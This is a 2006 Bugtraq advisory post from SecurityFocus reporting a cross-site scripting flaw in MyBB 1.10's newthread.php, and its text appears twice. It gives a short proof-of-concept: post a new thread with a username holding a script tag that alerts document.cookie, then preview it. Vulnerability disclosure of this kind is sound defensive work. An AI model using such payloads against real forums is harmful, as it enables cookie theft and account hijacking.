Threat level definition
Search:
Home
Bugtraq
Vulnerabilities
Mailing Lists
Jobs
Tools
Beta Programs
News
Infocus
Foundations
Microsoft
Unix
IDS
Incidents
Virus
Pen-Test
Firewalls
Columnists
Mailing Lists
Newsletters
Bugtraq
Focus on IDS
Focus on Linux
Focus on Microsoft
Forensics
Pen-test
Security Basics
Vuln Dev
Vulnerabilities
Jobs
Job Opportunities
Resumes
Job Seekers
Employers
Tools
RSS
News
Vulns
Security Research
BugTraq
Back to list
|
Post reply
MyBB 1.10 'newthread.php' < CrossSiteScripting >
Apr 09 2006 09:14PM
o y 6 hotmail com
MyBB 1.10 'newthread.php' < CrossSiteScripting >
[ Devil-00 | D3vil-0x1 ]
[*] Conditions [*]
1- your unregisterd user
2- you have permissions to do newthread
[---------------]
do newthread with this username :-
<script>alert(document.cookie);</script>D3vil-0x1
Then Preview it ;)
[---------------]
[ reply ]
Privacy Statement
Copyright 2009, SecurityFocus
[ Devil-00 | D3vil-0x1 ]
[*] Conditions [*]
1- your unregisterd user
2- you have permissions to do newthread
[---------------]
do newthread with this username :-
<script>alert(document.cookie);</script>D3vil-0x1
Then Preview it ;)
[---------------]
[ reply ]